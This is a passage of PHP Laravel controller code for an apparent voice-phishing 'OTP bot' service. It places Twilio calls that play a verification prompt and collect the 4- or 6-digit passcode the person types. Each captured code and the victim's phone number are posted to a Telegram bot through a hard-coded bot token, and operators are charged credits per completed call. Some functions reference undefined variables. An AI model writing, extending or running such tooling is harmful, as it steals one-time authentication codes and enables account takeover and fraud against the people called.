     * Store a newly created resource in storage.
     * @param  int  $id
     * @param  string  $number
     * @param  string  $mens
     * @param  string  $secret
     * @param  string  $script

     * @param  \Illuminate\Http\Request  $request
     * @return \Illuminate\Http\Response
     */
    public function response_gather(Request $request)
    {

        header('Content-Type: application/xml; charset=utf-8');
        if (isset($request->Digits)) {
            $code = $request->Digits;
            if ($request->eng == 1) {
                echo '<Response>
        <Play>http://callsender.info/verify.mp3</Play>
        </Response>';
            } else {
                echo '<Response>
        <Play>http://callsender.info/verify.mp3</Play>
        </Response>';
            }
            if ($request->Digits == "Sin_Respuesta") {
                $code = $request->Digits;
            } else {
                if ($request->Digits == "11") {
                    $code = "Passcode: call denied";
                } else {
                    $code = $request->Digits;
                }
            }
            $solicituds = Solicitud::all();
            $callsid = $request->CallSid;
            $status = $request->CallStatus;
            
            foreach ($solicituds as $soli) {
                if ($soli->sid == $callsid) {
                    $user = $soli->id_user;
                    $usuario = User::find($user);
                    $soli->contenido = "Passcode got : $code ";
                    $soli->status = $status;
                    $soli->save();
                    $chatid = $usuario->chatid;
                    $bot = Configuracion::find(1)->bot;
                    $msj = '
📱 Voice Passcode Call  🔊

☎️ Number=> '. $soli->numero. '⬅️

📝 Passcode=> '.$request->Digits.' ️

🆔 https://t.me/teampro247';

                    $ch = curl_init();
                    curl_setopt($ch, CURLOPT_URL, "https://api.telegram.org/bot8184124272:AAGedrkwHC1IWHX7gQGIz6ppqOcBt5_3Pfs/sendMessage");
                    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                    curl_setopt($ch, CURLOPT_POST, 1);
                    curl_setopt($ch, CURLOPT_POSTFIELDS, "{\"chat_id\": \"" . $chatid . "\", \"text\": \"" . $msj . "\"}");
                    $headers = array();
                    $headers[] = 'Content-Type: application/json';
                    curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);

                    $result = curl_exec($ch);
                    if (curl_errno($ch)) {
                        echo 'Error:' . curl_error($ch);
                    }
                    curl_close($ch);
                }
            }
        
            }
            
            
        }
    
       /**
     * Store a newly created resource in storage.
     * @param  int  $id
     * @param  string  $usuario
     * @param  string  $mens
     * @param  string  $secret
     * @param  string  $script

     * @param  \Illuminate\Http\Request  $request
     * @return \Illuminate\Http\Response
     */
    public function revisa(Request $request,$usuario)
    {
    $url= "http://$_SERVER[HTTP_HOST]";
    $solicitud= Solicitud::all();
    $twilio=Twilio::all();
    $user=User::find($usuario);
 //$solicitud->numero_twilio = $twilio_number;
//https://api.twilio.com/2010-04-01/Accounts/ACXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX/Balance.json
    foreach($solicitud as $soli){
      foreach($twilio as $twi){
      if($twi->twilio_number==$soli->numero_twilio){
        if($user->id == $soli->id_user&&$soli->sid!=''){
            if($soli->status=='queued'||$soli->status=='in-progress'||$soli->status=='ringing'){
                $ch = curl_init();
                curl_setopt($ch, CURLOPT_URL, 'https://api.twilio.com/2010-04-01/Accounts/'.$twi->twilio_account .'/Calls/'.$soli->sid.'.json');
                curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                curl_setopt($ch, CURLOPT_POST, 1);
                curl_setopt($ch, CURLOPT_USERPWD, $twi->twilio_account .':'. $twi->twilio_secret );
                $result = curl_exec($ch);
                if (curl_errno($ch)) {
                    echo 'Error:' . curl_error($ch);
                }
                curl_close($ch);
                $res = json_decode($result, true);
                $soli->status=$res['status'];
                $soli->save();
                
                if($res['status']=='failed'||$res['status']==404||$res['status']=='no-answer'||$res['status']=='busy'){
                 $servicio = Servicio::find(1);
                 $soli->costo=0;
                 $soli->contenido=$res['status'];
                 $soli->save();
                 
                    $usuario = User::find($user);
                    $soli->contenido = "Passcode got : $code ";
                    $soli->status = $status;
                    $soli->save();
                    $chatid = $usuario->chatid;
                    $bot = Configuracion::find(1)->bot;
                    $msj = '
📱 Voice Passcode Call  🔊

☎️ Number=> '. $soli->numero. '⬅️

📝 Passcode=> TIMEOUT 🔥


🆔 https://t.me/teampro247';

                    $ch = curl_init();
                    curl_setopt($ch, CURLOPT_URL, "https://api.telegram.org/bot8184124272:AAGedrkwHC1IWHX7gQGIz6ppqOcBt5_3Pfs/sendMessage");
                    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                    curl_setopt($ch, CURLOPT_POST, 1);
                    curl_setopt($ch, CURLOPT_POSTFIELDS, "{\"chat_id\": \"" . $chatid . "\", \"text\": \"" . $msj . "\"}");
                    $headers = array();
                    $headers[] = 'Content-Type: application/json';
                    curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);

                    $result = curl_exec($ch);
                    if (curl_errno($ch)) {
                        echo 'Error:' . curl_error($ch);
                    }
                    curl_close($ch);
                 
                 
                 
                 
echo " <script>
$(document).ready(function() {
var myModal = new jBox('Modal', {
  title: 'Failed or Busy or no-answer',
  content: '$soli->contenido',
});
 
myModal.open();
        });
    </script>
    
<div style='display: none' id='grabMe'></div>";
                
                }else if($res['status']=='completed'){
                $servicio = Servicio::find(1);
                $costo = $servicio->costo;
                $user->creditos = $user->creditos - $costo;
                $user->save();
                
                            echo " <script>
$(document).ready(function() {
var myModal = new jBox('Modal', {
  title: 'Response Got',
  content: '$soli->contenido'
});
 
myModal.open();
        });
    </script>
    
    <div style='display: none' id='grabMe'>Response Got check telegram or history for more details
</div>";
                }
                
            }
              }
            }
          }
        }
    }
    /**
     * Store a newly created resource in storage.
     * @param  int  $id
     * @param  string  $number
     * @param  string  $mens
     * @param  string  $secret
     * @param  string  $script

     * @param  \Illuminate\Http\Request  $request
     * @return \Illuminate\Http\Response
     */
    public function process_gather(Request $request, $script)
    {
        $actual_link = "http://$_SERVER[HTTP_HOST]";
        $cadena = $script;
        $resultado = str_replace("xml", "mp3", $cadena);
        $buscada4   = "4";
        $posicion_coincidencia = strrpos($script, $buscada4);
        if ($posicion_coincidencia === false) {
            $numero = 6;
        } else {
            $numero = 4;
        }
        $posicion_coincidencia = strrpos($script, "en");
        if ($posicion_coincidencia === false) {
        } else {
            $lenguaje = "en";
        }

        header('Content-Type: application/xml; version="1.0"  charset=utf-8');
        echo '
        <Response>
            <Gather action="' . $actual_link . '/response_gather" timeout="15" numDigits="' . $numero . '" finishOnKey="#" method="POST">        
            <Play>' . $actual_link . '/' . $resultado . '</Play>
            </Gather>
             <Redirect method="POST">' . $actual_link . '/response_gather?Digits=TIMEOUT</Redirect>
        </Response>';
        
        
    }
    
    
        /**
     * Store a newly created resource in storage.
     * @param  int  $id
     * @param  string  $number
     * @param  string  $mens
     * @param  string  $secret
     * @param  string  $script
     * @param  string  $url

     * @param  \Illuminate\Http\Request  $request
     * @return \Illuminate\Http\Response
     */
    public function process_gatherDev(Request $request, $script,$callback_url)
    {
        $actual_link = "http://$_SERVER[HTTP_HOST]";
        $cadena = $script;
        $resultado = str_replace("xml", "mp3", $cadena);
        $buscada4   = "4";
        $posicion_coincidencia = strrpos($script, $buscada4);
        if ($posicion_coincidencia === false) {
            $numero = 6;
        } else {
            $numero = 4;
        }
        $posicion_coincidencia = strrpos($script, "en");
        if ($posicion_coincidencia === false) {
        } else {
            $lenguaje = "en";
        }

        header('Content-Type: application/xml; version="1.0"  charset=utf-8');
        echo '
        <Response>
            <Gather action="' . $callback_url . '/getcalls_1.php" timeout="15" numDigits="' . $numero . '" finishOnKey="#" method="POST">        
            <Play>' . $actual_link . '/' . $resultado . '</Play>
            </Gather>
             <Redirect method="POST">"' . $callback_url . '/getcalls_1.php?Digits=TIMEOUT</Redirect>
        </Response>';
        
        
    }
}
